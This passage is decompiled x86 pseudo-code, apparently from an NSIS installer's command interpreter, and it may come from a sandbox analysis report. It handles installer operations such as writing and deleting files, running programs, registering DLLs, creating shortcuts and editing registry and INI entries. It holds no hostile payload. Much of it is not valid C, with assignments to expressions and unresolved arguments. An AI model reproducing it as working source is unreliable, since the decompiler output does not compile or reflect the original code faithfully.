								__eax = GetShortPathNameW(__edi, __edi, 0x2004);
							}
							goto L430;
						}
						__eax = _a4;
						__eflags = __eax - __esi;
						if(__eax <= __esi) {
							goto L59;
						}
						__eflags =  *__eax - __bx;
						if( *__eax == __bx) {
							goto L59;
						}
						__eax = E00406301(__esi);
						__eflags = __eax;
						if(__eax == 0) {
							goto L58;
						}
						__eax = E00406035(_a4, __eax);
						goto L59;
					case 0x10:
						__eax = E0040145C(__edx, 0xffffffff);
						__ecx =  &_a4;
						__eax = SearchPathW(0, __eax, 0, 0x2004, __esi,  &_a4);
						goto L62;
					case 0x11:
						__eax = E0040145C(__edx, 0xffffffef);
						__eax = E00405EAB(__ecx, __esi, __eax); // executed
						goto L65;
					case 0x12:
						__esi = E0040145C(__edx, 0x31);
						__eax = _v48;
						__ecx = __eax;
						__eax = __eax >> 3;
						_push(__esi);
						__eax = __eax & 0x00000002;
						__ecx = __ecx & 0x00000007;
						_push(__eax);
						_v56 = __esi;
						_a4 = __ecx;
						__eax = E004062CF(L"File: overwriteflag=%d, allowskipfilesflag=%d, name=\"%s\"", __ecx);
						__eax = E00405D51(__esi);
						_push(__esi);
						__esi = L"install";
						__eflags = __eax;
						if(__eax == 0) {
							__eax = E00406035(__esi, 0x4d70b0);
							__eax = lstrcatW(__eax, ??);
						} else {
							_push(__esi);
							__eax = E00406035();
						}
						__eax = E00406064(__esi);
						__edi = 0x4140f8;
						while(1) {
							__eflags = _a4 - 3;
							if(_a4 >= 3) {
								__eax = E00406301(__esi);
								__ecx = 0;
								__eflags = __eax - __ebx;
								if(__eax != __ebx) {
									__ecx =  &_v36;
									__eax =  &(__eax[0xa]);
									__eflags = __eax;
									__ecx = __eax;
								}
								_a4 = _a4 + 0xfffffffd;
								_a4 + 0xfffffffd | 0x80000000 = (_a4 + 0xfffffffd | 0x80000000) & __ecx;
								__eax =  ~((_a4 + 0xfffffffd | 0x80000000) & __ecx);
								asm("sbb eax, eax");
								__eax =  ~((_a4 + 0xfffffffd | 0x80000000) & __ecx) + 1;
								__eflags = __eax;
								_a4 = __eax;
							}
							__eflags = _a4 - __ebx;
							if(_a4 == __ebx) {
								__eax = E00405E5C(__esi);
							}
							__eax = 0;
							__eflags = _a4 - 1;
							0 | __eflags != 0x00000000 = (__eflags != 0) + 1;
							__eax = E00405E7C(__esi, 0x40000000, (__eflags != 0) + 1);
							_v12 = __eax;
							__eflags = __eax - 0xffffffff;
							if(__eax != 0xffffffff) {
								break;
							}
							__eflags = _a4 - __ebx;
							if(_a4 != __ebx) {
								__eax = E00404F9E(0xffffffe2, _v56);
								__eflags = _a4 - 2;
								if(_a4 == 2) {
									_v8 = 1;
								}
								_push(_a4);
								_push(__esi);
								_push(L"File: skipped: \"%s\" (overwriteflag=%d)");
								goto L87;
							}
							__eax = E004062CF(L"File: error creating \"%s\"", __esi);
							_pop(__ecx);
							_pop(__ecx);
							E00406035(__edi, 0x47f000) = E00406035(0x47f000, __esi);
							E00406831(__ebx, __edi, __esi, 0x4100f0, _v28) = E00406035(0x47f000, __edi);
							_v48 = _v48 >> 3;
							__eax = E00405CCC(0x4100f0, _v48 >> 3);
							__eax = __eax - 4;
							__eflags = __eax;
							if(__eax != 0) {
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									_push(L"File: error, user cancel");
									__eax = E004062CF();
									 *0x47eb68 =  *0x47eb68 + 1;
									_pop(__ecx);
									goto L431;
								}
								_push(L"File: error, user abort");
								__eax = E004062CF();
								_pop(__ecx);
								_push(__esi);
								_push(0xfffffffa);
								L4:
								__eax = E00404F9E();
								goto L5;
							}
							_push(L"File: error, user retry");
							__eax = E004062CF();
							_pop(__ecx);
						}
						__eax = E00404F9E(0xffffffea, _v56);
						 *0x47eb94 =  *0x47eb94 + 1;
						__eax = E0040337F(_v40, _v12, __ebx, __ebx); // executed
						 *0x47eb94 =  *0x47eb94 - 1;
						__edi = __eax;
						_push(__esi);
						__eax = E004062CF(L"File: wrote %d to \"%s\"", __edi);
						__eflags = _v36.dwLowDateTime - 0xffffffff;
						if(_v36.dwLowDateTime != 0xffffffff) {
							L92:
							 &_v36 = SetFileTime(_v12,  &_v36, __ebx,  &_v36);
							L93:
							__eax = FindCloseChangeNotification(_v12); // executed
							__eflags = __edi - __ebx;
							if(__edi >= __ebx) {
								goto L430;
							}
							__eflags = __edi - 0xfffffffe;
							if(__edi != 0xfffffffe) {
								__eax = E00406831(__ebx, __edi, __esi, __esi, 0xffffffee);
							} else {
								E00406831(__ebx, __edi, __esi, __esi, 0xffffffe9) = lstrcatW(__esi, _v56);
							}
							__eax = E004062CF(L"%s", __esi);
							_pop(__ecx);
							_pop(__ecx);
							_push(0x200010);
							_push(__esi);
							goto L98;
						}
						__eflags = _v36.dwHighDateTime - 0xffffffff;
						if(_v36.dwHighDateTime == 0xffffffff) {
							goto L93;
						}
						goto L92;
					case 0x13:
						__eax = E0040145C(__edx, 0);
						__esi = __eax;
						_push(__eax);
						_push(L"Delete: \"%s\"");
						goto L100;
					case 0x14:
						__eax = E0040145C(__edx, 0x31);
						__esi = __eax;
						_push(__eax);
						__eax = E004062CF(L"MessageBox: %d,\"%s\"", _v48);
						__eax = E00405CCC(__esi, _v48);
						__eflags = __eax;
						if(__eax == 0) {
							goto L67;
						}
						__eflags = __eax - _v40;
						if(__eax != _v40) {
							__eflags = __eax - _v36.dwHighDateTime;
							if(__eax != _v36.dwHighDateTime) {
								goto L430;
							}
							__eax = _v28;
							return _v28;
						}
						goto L103;
					case 0x15:
						__eax = E0040145C(__edx, 0xfffffff0);
						__esi = __eax;
						_push(__eax);
						_push(L"RMDir: \"%s\"");
						L100:
						__eax = E004062CF();
						_pop(__ecx);
						_pop(__ecx);
						__eax = E00406CC7(__eflags, __esi, _v44); // executed
						goto L430;
					case 0x16:
						__eax = E0040145C(__edx, 1);
						__eax = lstrlenW(__eax);
						goto L427;
					case 0x17:
						_push(2);
						_pop(__ecx);
						__eax = E00401446(__ecx);
						_push(3);
						_pop(__ecx);
						_a4 = __eax;
						__edi = E00401446(__ecx);
						__eax = E0040145C(__edx, 1);
						__ecx = 0;
						_v96.hNameMappings = __eax;
						 *__esi = __cx;
						__eflags = _v40;
						if(_v40 == 0) {
							L110:
							__eax = lstrlenW(__eax);
							__eflags = __edi - __ebx;
							if(__edi >= __ebx) {
								L112:
								__eflags = __edi - __eax;
								if(__edi > __eax) {
									__edi = __eax;
								}
								_v96.hNameMappings = _v96.hNameMappings + __edi * 2;
								__eax = E00406035(__esi, _v96.hNameMappings + __edi * 2);
								__edi = _a4;
								__eflags = __edi - __ebx;
								if(__eflags != 0) {
									if(__eflags < 0) {
										__edi = __edi + lstrlenW(__esi);
										__eflags = __edi;
										if(__edi < 0) {
											__edi = __ebx;
										}
									}
									__eflags = __edi - 0x2004;
									if(__edi < 0x2004) {
										__eax = 0;
										__esi[__edi] = __ax;
									}
								}
								goto L430;
							}
							__edi = __edi + __eax;
							__eflags = __edi;
							if(__edi < 0) {
								goto L430;
							}
							goto L112;
						}
						__eflags = _a4;
						if(_a4 == 0) {
							goto L430;
						}
						goto L110;
					case 0x18:
						__esi = E0040145C(__edx, 0x20);
						_push(E0040145C(__edx, 0x31));
						_push(__esi);
						__eflags = _v36.dwHighDateTime;
						if(_v36.dwHighDateTime != 0) {
							__eax = lstrcmpW();
						} else {
							__eax = lstrcmpiW();
						}
						__eflags = __eax;
						if(__eax != 0) {
							goto L103;
						} else {
							goto L44;
						}
					case 0x19:
						__edi = E0040145C(__edx, 1);
						__eax = ExpandEnvironmentStringsW(__edi, __esi, 0x2004);
						__eflags = __eax;
						if(__eax == 0) {
							L128:
							__eax = 0;
							__eflags = 0;
							_v8 = 1;
							 *__esi = __ax;
							L129:
							__eax = 0;
							__esi[0x2003] = __ax;
							goto L430;
						}
						__eflags = _v40;
						if(_v40 == 0) {
							goto L129;
						}
						__eax = lstrcmpW(__edi, __esi);
						__eflags = __eax;
						if(__eax != 0) {
							goto L129;
						}
						goto L128;
					case 0x1a:
						__ecx = 0;
						__eax = E00401446(0);
						__ecx = 0;
						__ecx = 1;
						__esi = __eax;
						__eax = E00401446(1);
						__eflags = _v28;
						if(_v28 != 0) {
							__eflags = __esi - __eax;
							if(__eflags < 0) {
								L103:
								__eax = _v36.dwLowDateTime;
								return _v36.dwLowDateTime;
							}
							if(__eflags <= 0) {
								goto L44;
							}
							L133:
							__eax = _v36.dwHighDateTime;
							return _v36.dwHighDateTime;
						}
						__eflags = __esi - __eax;
						if(__eflags < 0) {
							goto L103;
						}
						if(__eflags <= 0) {
							goto L44;
						}
						goto L133;
					case 0x1b:
						__ecx = 0;
						__ecx = 1;
						__eax = E00401446(1);
						_push(2);
						_pop(__ecx);
						__edi = __eax;
						__ecx = E00401446(1);
						__eax = _v36.dwLowDateTime;
						__eflags = __eax - 0xc;
						if(__eax > 0xc) {
							L159:
							_push(__edi);
							goto L428;
						}
						switch( *((intOrPtr*)(__eax * 4 +  &M00403218))) {
							case 0:
								__edi = __edi + __ecx;
								goto L159;
							case 1:
								__edi = __edi - __ecx;
								goto L159;
							case 2:
								__edi = __edi * __ecx;
								goto L159;
							case 3:
								__eflags = __ecx;
								if(__ecx == 0) {
									goto L144;
								}
								__eax = __edi;
								asm("cdq");
								_t134 = __eax % __ecx;
								__eax = __eax / __ecx;
								__edx = _t134;
								goto L149;
							case 4:
								__edi = __edi | __ecx;
								goto L159;
							case 5:
								__edi = __edi & __ecx;
								goto L159;
							case 6:
								__edi = __edi ^ __ecx;
								goto L159;
							case 7:
								__eax = 0;
								__eflags = __edi;
								_t139 = __edi == 0;
								__eflags = _t139;
								__eax = 0 | _t139;
								L149:
								__edi = __eax;
								goto L159;
							case 8:
								__eflags = __edi;
								if(__edi != 0) {
									goto L152;
								}
								goto L151;
							case 9:
								__eflags = __edi;
								if(__edi != 0) {
									L151:
									__eflags = __ecx - __ebx;
									if(__ecx == __ebx) {
										goto L154;
									}
									L152:
									__edi = 0;
									__edi = 1;
									goto L159;
								}
								L154:
								__edi = 0;
								goto L159;
							case 0xa:
								__eflags = __ecx;
								if(__ecx == 0) {
									L144:
									__edi = 0;
									_v8 = 1;
									goto L159;
								}
								__eax = __edi;
								asm("cdq");
								_t141 = __eax % __ecx;
								__eax = __eax / __ecx;
								__edx = _t141;
								__edi = _t141;
								goto L159;
							case 0xb:
								__edi = __edi << __cl;
								goto L159;
							case 0xc:
								__edi = __edi >> __cl;
								goto L159;
						}
					case 0x1c:
						__eax = E0040145C(__edx, 1);
						_push(2);
						_pop(__ecx);
						__edi = __eax;
						E00401446(__ecx) = wsprintfW(__esi, __edi, __eax);
						goto L88;
					case 0x1d:
						__eax = _v40;
						__edi =  *0x40c0e0; // 0x0
						__eflags = __eax;
						if(__eax == 0) {
							__eflags = __ecx;
							if(__ecx == 0) {
								__eax = GlobalAlloc(0x40, 0x400c); // executed
								__esi = __eax;
								_t148 =  &(__esi[2]); // 0x4
								_t148 = E00406831(__ebx, __edi, __esi, _t148, _v48);
								__eax =  *0x40c0e0; // 0x0
								 *__esi = __eax;
								 *0x40c0e0 = __esi;
								goto L430;
							}
							__eflags = __edi;
							if(__edi != 0) {
								_t146 = __edi + 4; // 0x4
								_t146 = E00406035(__esi, _t146);
								__eax =  *__edi;
								 *0x40c0e0 =  *__edi;
								_push(__edi);
								goto L220;
							}
							_push(L"Pop: stack empty");
							__eax = E004062CF();
							_pop(__ecx);
							goto L67;
						} else {
							goto L162;
						}
						while(1) {
							L162:
							__eax = __eax - 1;
							__eflags = __edi - __ebx;
							if(__edi == __ebx) {
								break;
							}
							__edi =  *__edi;
							__eflags = __eax - __ebx;
							if(__eax != __ebx) {
								continue;
							}
							__eflags = __edi - __ebx;
							if(__edi != __ebx) {
								__edi = __edi + 4;
								__esi = L"install";
								__eax = E00406035(__esi, __edi);
								__eax =  *0x40c0e0; // 0x0
								__eax = E00406035(__edi, __eax);
								__eax =  *0x40c0e0; // 0x0
								_push(__esi);
								_push(__eax);
								goto L386;
							}
							break;
						}
						__eax = E004062CF(L"Exch: stack < %d elements", _v40);
						_pop(__ecx);
						_pop(__ecx);
						goto L166;
					case 0x1e:
						_push(3);
						_pop(__ecx);
						__eax = E00401446(__ecx);
						_push(4);
						_pop(__ecx);
						_v56 = __eax;
						__eax = E00401446(__ecx);
						__eflags = _v28 & 0x00000001;
						_a4 = __eax;
						if((_v28 & 0x00000001) != 0) {
							_v56 = E0040145C(__edx, 0x33);
						}
						__eflags = _v28 & 0x00000002;
						if((_v28 & 0x00000002) != 0) {
							_a4 = E0040145C(__edx, 0x44);
						}
						__eflags = _v52 - 0x21;
						if(_v52 != 0x21) {
							__edi = E0040145C(__edx, 1);
							__eax = E0040145C(__edx, 0x12);
							 *__eax & 0x0000ffff =  ~( *__eax & 0x0000ffff);
							asm("sbb ecx, ecx");
							__ecx =  ~( *__eax & 0x0000ffff) & __eax;
							 *__edi & 0x0000ffff =  ~( *__edi & 0x0000ffff);
							asm("sbb eax, eax");
							__eax =  ~( *__edi & 0x0000ffff) & __edi;
							__eflags = __eax;
							__eax = FindWindowExW(_v56, _a4, __eax, __ecx);
							goto L182;
						} else {
							__ecx = 0;
							__ecx = 1;
							__eax = E00401446(1);
							_push(2);
							_pop(__ecx);
							__edi = __eax;
							__eax = E00401446(1);
							__ecx = _v28;
							__ecx = _v28 >> 2;
							__eflags = __ecx - __ebx;
							if(__ecx == __ebx) {
								__eax = SendMessageW(__edi, __eax, _v56, _a4);
								L182:
								_v12 = __eax;
								L183:
								__eflags = _v48 - __ebx;
								if(_v48 < __ebx) {
									goto L430;
								}
								_push(_v12);
								goto L428;
							}
							__edx =  &_v12;
							__eax = SendMessageTimeoutW(__edi, __eax, _v56, _a4, __ebx, __ecx,  &_v12);
							__eax =  ~__eax;
							asm("sbb eax, eax");
							_v8 = __eax;
							goto L183;
						}
					case 0x1f:
						__ecx = 0;
						__eax = E00401446(0);
						__eax = IsWindow(__eax);
						__eflags = __eax;
						if(__eax == 0) {
							L44:
							__eax = _v40;
							return _v40;
						}
						L42:
						__eax = _v44;
						return _v44;
					case 0x20:
						_push(2);
						_pop(__ecx);
						__eax = E00401446(__ecx);
						__ecx = 0;
						__ecx = 1;
						__eax = E00401446(1);
						__eax = GetDlgItem(__eax, __eax);
						goto L427;
					case 0x21:
						 *0x47eae8 =  *0x47eae8;
						__ecx = 0;
						E00401446(0) = SetWindowLongW(__eax, 0xffffffeb,  *0x47eae8);
						goto L430;
					case 0x22:
						__esi = GetDlgItem(_v16, __ecx);
						 &(_v96.pTo) = GetClientRect(__esi,  &(_v96.pTo));
						_v96.hNameMappings = _v96.hNameMappings * _v40;
						_v96.fAnyOperationsAborted = _v96.fAnyOperationsAborted * _v40;
						__eax = E0040145C(__edx, 0);
						__eax = LoadImageW(0, __eax, 0, _v96.fAnyOperationsAborted * _v40, _v96.hNameMappings * _v40, 0x10);
						__eax = SendMessageW(__esi, 0x172, 0, __eax);
						__eflags = __eax;
						if(__eax != 0) {
							__eax = DeleteObject(__eax);
						}
						goto L430;
					case 0x23:
						_push(0x48);
						__eax = GetDC(_v16);
						_push(__eax);
						_push(2);
						_pop(__ecx);
						__eax = E00401446(__ecx);
						__eax = MulDiv(__eax, ??, ??);
						_push(3);
						__eax =  ~__eax;
						_pop(__ecx);
						0x420110->lfHeight = __eax;
						 *0x420120 = E00401446(__ecx);
						__al = _v36.dwHighDateTime;
						__al = __al & 0x00000001;
						 *0x420124 = __al & 0x00000001;
						__cl = __al;
						__cl = __al & 0x00000002;
						__al = __al & 0x00000004;
						 *0x420125 = __cl;
						 *0x420126 = __al;
						 *0x420127 = 1;
						__eax = E00406831(__ebx, __edi, __esi, 0x42012c, _v44);
						__eax = CreateFontIndirectW(0x420110);
						goto L427;
					case 0x24:
						__ecx = 0;
						__eax = E00401446(0);
						__ecx = 0;
						__ecx = 1;
						__esi = __eax;
						__edi = E00401446(1);
						__eflags = _v40;
						if(_v40 != 0) {
							_push(L"HideWindow");
							__eax = E004062CF();
							_pop(__ecx);
						}
						_push(__edi);
						_push(__esi);
						__eflags = _v36.dwLowDateTime - __ebx;
						if(_v36.dwLowDateTime != __ebx) {
							__eax = EnableWindow();
						} else {
							__eax = ShowWindow();
						}
						goto L430;
					case 0x25:
						__esi = E0040145C(__edx, 0);
						__ebx = E0040145C(__edx, 0x31);
						__edi = E0040145C(__edx, 0x22);
						E0040145C(__edx, 0x15) = E00404F9E(0xffffffec, 0x4100f0);
						 *__edi & 0x0000ffff =  ~( *__edi & 0x0000ffff);
						asm("sbb eax, eax");
						 ~( *__edi & 0x0000ffff) & __edi =  *__esi & 0x0000ffff;
						__eax =  ~( *__esi & 0x0000ffff);
						asm("sbb eax, eax");
						__eax =  ~( *__esi & 0x0000ffff) & __esi;
						__eax = ShellExecuteW(_v16,  ~( *__esi & 0x0000ffff) & __esi, __ebx,  ~( *__edi & 0x0000ffff) & __edi, 0x4d70b0, _v36.dwLowDateTime);
						__eflags = __eax - 0x21;
						if(__eax >= 0x21) {
							_push(__edi);
							_push(__ebx);
							__eax = E004062CF(L"ExecShell: success (\"%s\": file:\"%s\" params:\"%s\")", __esi);
							goto L430;
						}
						_push(__eax);
						_push(__edi);
						_push(__ebx);
						__eax = E004062CF(L"ExecShell: warning: error (\"%s\": file:\"%s\" params:\"%s\")=%d", __esi);
						goto L67;
					case 0x26:
						__esi = E0040145C(__edx, 0);
						__eax = E004062CF(L"Exec: command=\"%s\"", __esi);
						_pop(__ecx);
						_pop(__ecx);
						__eax = E00404F9E(0xffffffeb, __esi);
						__eax = E00405C6B(__esi);
						_a4 = __eax;
						_push(__esi);
						__eflags = __eax;
						if(__eax == 0) {
							_push(L"Exec: failed createprocess (\"%s\")");
							L51:
							_v8 = 1;
							goto L52;
						}
						_push(L"Exec: success (\"%s\")");
						__eax = E004062CF();
						_pop(__ecx);
						_pop(__ecx);
						__eflags = _v40;
						if(_v40 == 0) {
							L209:
							_push(_a4);
							goto L313;
						}
						__esi = WaitForSingleObject;
						while(1) {
							__eax = WaitForSingleObject(_a4, 0x64);
							__eflags = __eax - 0x102;
							if(__eax != 0x102) {
								break;
							}
							__eax = E0040635E(0xf);
						}
						 &_v20 = GetExitCodeProcess(_a4,  &_v20);
						__eflags = _v44 - __ebx;
						if(_v44 < __ebx) {
							__eflags = _v20 - __ebx;
							if(_v20 != __ebx) {
								_v8 = 1;
							}
						} else {
							__eax = E00405F7D(__edi, _v20);
						}
						goto L209;
					case 0x27:
						__eax = E0040145C(__edx, 2);
						__eax = E00406301(__eax);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = 0;
							 *__esi = __ax;
							 *__edi = __ax;
							goto L67;
						}
						__ebx = __eax;
						__eax = E00405F7D(__edi,  *((intOrPtr*)(__ebx + 0x14)));
						_push( *((intOrPtr*)(__ebx + 0x18)));
						goto L428;
					case 0x28:
						__eax = E0040145C(__edx, 0xffffffee);
						__ecx =  &_v24;
						_v96.hNameMappings = __eax;
						__eax = GetFileVersionInfoSizeW(__eax,  &_v24);
						__ecx = 0;
						 *__esi = __cx;
						_v20 = __eax;
						 *__edi = __cx;
						_v8 = 1;
						__eflags = __eax;
						if(__eax == 0) {
							goto L430;
						}
						__eax = GlobalAlloc(0x40, __eax);
						_a4 = __eax;
						__eflags = __eax;
						if(__eax == 0) {
							goto L430;
						}
						__eax = GetFileVersionInfoW(_v96.hNameMappings, 0, _v20, __eax);
						__eflags = __eax;
						if(__eax != 0) {
							 &(_v96.hNameMappings) =  &_v12;
							__eax = VerQueryValueW(_a4, "\\",  &_v12,  &(_v96.hNameMappings));
							__eflags = __eax;
							if(__eax != 0) {
								_v12 = E00405F7D(__esi,  *((intOrPtr*)(_v12 + 8)));
								_v12 = E00405F7D(__edi,  *((intOrPtr*)(_v12 + 0xc)));
								_v8 = 0;
							}
						}
						goto L219;
					case 0x29:
						__edi = E0040145C(__edx, 0x11);
						__eax = E00407224(__eflags, __edi, __esi, 0x2004);
						__eflags = __eax;
						if(__eax == 0) {
							_v8 = 1;
						}
						_push(__esi);
						_push(__edi);
						_push(L"GetTTFVersionString(%s) returned %s");
						goto L87;
					case 0x2a:
						__edi = E0040145C(__edx, 0x11);
						__eax = E00407296(__edi, __esi, 0x2004);
						__eflags = __eax;
						if(__eax == 0) {
							_v8 = 1;
						}
						_push(__esi);
						_push(__edi);
						_push(L"GetTTFFontName(%s) returned %s");
						goto L87;
					case 0x2b:
						_v8 = 1;
						__eflags =  *0x47eb98;
						if( *0x47eb98 < 0) {
							__eax = E00404F9E(0xffffffe7, 0x4100f0);
							_push(L"Error registering DLL: Could not initialize OLE");
							L26:
							__eax = E004062CF();
							goto L27;
						}
						__edi = E0040145C(__edx, 0xfffffff0);
						_v12 = E0040145C(__edx, 1);
						__eflags = _v36.dwHighDateTime;
						if(_v36.dwHighDateTime == 0) {
							L230:
							__eax = LoadLibraryExW(__edi, __ebx, 8); // executed
							_a4 = __eax;
							__eflags = __eax - __ebx;
							if(__eax == __ebx) {
								__eax = E00404F9E(0xfffffff6, 0x4100f0);
								_push(__edi);
								_push(L"Error registering DLL: Could not load %s");
								goto L52;
							}
							L231:
							__esi = E00406391(_a4, _v12);
							__eflags = __esi - __ebx;
							if(__esi == __ebx) {
								__eax = E00404F9E(0xfffffff7, _v12);
								_push(__edi);
								__eax = E004062CF(L"Error registering DLL: %s not found in %s", _v12);
							} else {
								_v8 = __ebx;
								__eflags = _v40 - __ebx;
								if(_v40 == __ebx) {
									_push("`�G");
									_push(0x40c0e0);
									_push(0x47f000);
									_push(0x2004);
									_push(_v16);
									__eax =  *__esi(); // executed
									__esp = __esp + 0x14;
								} else {
									__eax = E00401435(_v40);
									__eax =  *__esi();
									__eflags = __eax;
									if(__eax != 0) {
										_v8 = 1;
									}
								}
							}
							__eflags = _v36.dwLowDateTime - __ebx;
							if(_v36.dwLowDateTime == __ebx) {
								__eax = E00403CE4(_a4);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = FreeLibrary(_a4);
								}
							}
							goto L430;
						}
						__eax = GetModuleHandleW(__edi); // executed
						_a4 = __eax;
						__eflags = __eax;
						if(__eax != 0) {
							goto L231;
						}
						goto L230;
					case 0x2c:
						_v16 = E0040145C(__edx, 0xfffffff0);
						__edi = E0040145C(__edx, 0xffffffdf);
						_v12 = E0040145C(__edx, 2);
						_v20 = E0040145C(__edx, 0xffffffcd);
						_v96.hNameMappings = E0040145C(__edx, 0x45);
						__eax = E00405D51(__edi);
						__eflags = __eax;
						if(__eax == 0) {
							__eax = E0040145C(__edx, 0x21);
						}
						__eax = _v36.dwHighDateTime;
						__eax = __eax >> 0x10;
						_push(__eax >> 0x10);
						__eax = __eax >> 8;
						__esi = 0xff;
						__ecx = __eax >> 0x00000008 & 0x000000ff;
						_push(__eax >> 0x00000008 & 0x000000ff);
						_push(__eax);
						_push(_v20);
						_push(_v12);
						_push(__edi);
						__eax = E004062CF(L"CreateShortCut: out: \"%s\", in: \"%s %s\", icon: %s,%d, sw=%d, hk=%d", _v16);
						__eax =  &_a4;
						_push(__eax);
						_push(0x40ac10);
						_push(1);
						_push(__ebx);
						_push(0x40ac30);
						__imp__CoCreateInstance();
						__eflags = __eax - __ebx;
						if(__eax < __ebx) {
							L254:
							_push(0x4100f0);
							_v8 = 1;
							_push(0xfffffff0);
							goto L10;
						} else {
							__eax = _a4;
							__ecx =  *__eax;
							__edx =  &_v24;
							_push( &_v24);
							_push(0x40ac20);
							_push(__eax);
							__eax =  *( *__eax)();
							_v56 = __eax;
							__eflags = __eax - __ebx;
							if(__eax >= __ebx) {
								__eax = _a4;
								__ecx =  *__eax;
								_push(__edi);
								_push(__eax);
								_v56 = __eax;
								__eax = _a4;
								__ecx =  *__eax;
								_push(0x4d70b0);
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 0x24))();
								__ecx = _v36.dwHighDateTime;
								__ecx = __ecx >> 8;
								__eax = __ecx >> 0x00000008 & 0x000000ff;
								__eflags = __eax;
								if(__eax != 0) {
									__ecx = _a4;
									__edx =  *__ecx;
									_push(__eax);
									_push(__ecx);
									__eax =  *((intOrPtr*)( *__ecx + 0x3c))();
									__ecx = _v36.dwHighDateTime;
								}
								__eax = _a4;
								__edx =  *__eax;
								_push(__ecx);
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 0x34))();
								__eax = _v20;
								__eflags =  *__eax - __bx;
								if( *__eax != __bx) {
									__edi = _v36.dwHighDateTime;
									__ecx = _a4;
									__edx =  *__ecx;
									__edi = _v36.dwHighDateTime & __esi;
									__eflags = __edi;
									_push(__edi);
									_push(__eax);
									_push(__ecx);
									__eax =  *((intOrPtr*)( *__ecx + 0x44))();
								}
								__eax = _a4;
								_push(_v12);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 0x2c))();
								__eax = _a4;
								_push(_v96.hNameMappings);
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 0x1c))();
								__eflags = _v56 - __ebx;
								if(_v56 >= __ebx) {
									__eax = _v24;
									__ecx =  *__eax;
									_push(1);
									_push(_v16);
									_push(__eax);
									_v56 = __eax;
								}
								__eax = _v24;
								__ecx =  *__eax;
								_push(__eax);
								__eax =  *((intOrPtr*)( *__eax + 8))();
							}
							__eax = _a4;
							__ecx =  *__eax;
							_push(__eax);
							__eax =  *((intOrPtr*)( *__eax + 8))();
							__eflags = _v56 - __ebx;
							if(_v56 >= __ebx) {
								_push(0x4100f0);
								_push(0xfffffff4);
								L10:
								__eax = E00404F9E();
								goto L430;
							} else {
								goto L254;
							}
						}
					case 0x2d:
						__esi = E0040145C(__edx, 0);
						__edi = E0040145C(__edx, 0x11);
						__eax = E0040145C(__edx, 0x23);
						_push(__edi);
						_a4 = __eax;
						__eax = E004062CF(L"CopyFiles \"%s\"->\"%s\"", __esi);
						__eax = E00406301(__esi);
						__eflags = __eax;
						if(__eax != 0) {
							__eax = _v16;
							_v96.hwnd = _v16;
							_v96.wFunc = 2;
							__eax = lstrlenW(__esi);
							__ecx = 0;
							 *(__esi + 2 + __eax * 2) = __cx;
							__eax = lstrlenW(__edi);
							__ecx = 0;
							 *(__edi + 2 + __eax * 2) = __cx;
							__eax = _a4;
							__cx = _v40;
							_v96.pFrom = __esi;
							_v96.pTo.left = __edi;
							_v70 = _a4;
							_v96.fFlags = _v40;
							E00404F9E(0, _a4) =  &_v96;
							__eax = SHFileOperationW( &_v96);
							__eflags = __eax;
							if(__eax == 0) {
								goto L430;
							}
						}
						__eax = E00404F9E(0xfffffff9, __ebx);
						goto L67;
					case 0x2e:
						__eflags = __edx - 0xbadf00d;
						if(__edx != 0xbadf00d) {
							L166:
							_push(0x200010);
							_push(E00406831(__ebx, __edi, __esi, __ebx, 0xffffffe8));
							L98:
							__eax = E00405CCC();
							L5:
							__eax = 0x7fffffff;
							return 0x7fffffff;
						}
						 *0x47eb74 =  *0x47eb74 + 1;
						goto L430;
					case 0x2f:
						__esi = 0x4100f0;
						_v20 = 0;
						_v24 = 0;
						_a4 = 0;
						__eax = E00406035(0x4100f0, L"<RM>");
						__edi = 0x4140f8;
						__eax = E00406035(0x4140f8, 0x4100f0);
						__eflags = _v48;
						if(_v48 != 0) {
							_v20 = E0040145C(__edx, 0);
						}
						__eflags = _v44 - __ebx;
						if(_v44 != __ebx) {
							_v24 = E0040145C(__edx, 0x11);
						}
						__eflags = _v36.dwHighDateTime - __ebx;
						if(_v36.dwHighDateTime != __ebx) {
							_a4 = E0040145C(__edx, 0x22);
						}
						__ebx = E0040145C(__edx, 0xffffffcd);
						_push(__ebx);
						_push(__edi);
						_push(__esi);
						__eax = E004062CF(L"WriteINIStr: wrote [%s] %s=%s in %s", L"install");
						__eax = WritePrivateProfileStringW(_v20, _v24, _a4, __ebx);
						goto L65;
					case 0x30:
						__eax =  *L"!N~"; // 0x4e0021
						_v96.fAnyOperationsAborted = __eax;
						__eax =  *0x409590; // 0x7e
						_v96.hNameMappings = __eax;
						__edi = E0040145C(__edx, 1);
						__ebx = E0040145C(__edx, 0x12);
						E0040145C(__edx, 0xffffffdd) =  &(_v96.fAnyOperationsAborted);
						GetPrivateProfileStringW(__edi, __ebx,  &(_v96.fAnyOperationsAborted), __esi, 0x2003,  &(_v96.fAnyOperationsAborted)) =  &(_v96.fAnyOperationsAborted);
						__eax = lstrcmpW(__esi,  &(_v96.fAnyOperationsAborted));
						L62:
						__eflags = __eax;
						if(__eax != 0) {
							goto L430;
						}
						goto L63;
					case 0x31:
						_a4 = E004061EC(__ecx);
						__eflags = _v36.dwHighDateTime;
						if(_v36.dwHighDateTime != 0) {
							__eax = E0040145C(__edx, 0x22);
							__esi = __eax;
							_push(__eax);
							__eax = E004062CF(L"DeleteRegKey: \"%s\\%s\"", _a4);
							__eax = _v44;
							__eflags = __eax;
							if(__eax == 0) {
								 *0x47eb64 =  *0x47eb64 + 0x80000001;
								__eflags =  *0x47eb64 + 0x80000001;
							}
							_v36.dwHighDateTime = _v36.dwHighDateTime & 0x00000002;
							__eflags = _v36.dwHighDateTime & 0x00000002;
							_v24 = __eax;
							L276:
							__eflags = _v24 - __ebx;
							if(_v24 == __ebx) {
								goto L430;
							}
							goto L67;
						}
						__edi = E00401553(2);
						__eflags = __edi;
						if(__edi == 0) {
							goto L67;
						}
						__esi = E0040145C(__edx, 0x33);
						__eax = RegDeleteValueW(__edi, __esi);
						_push(__esi);
						_push(0x4140f8);
						_v24 = __eax;
						E004062CF(L"DeleteRegValue: \"%s\\%s\" \"%s\"", _a4) = RegCloseKey(__edi);
						goto L276;
					case 0x32:
						__eflags = __edx;
						if(__edx == 0) {
							__edi =  *0x47eb64;
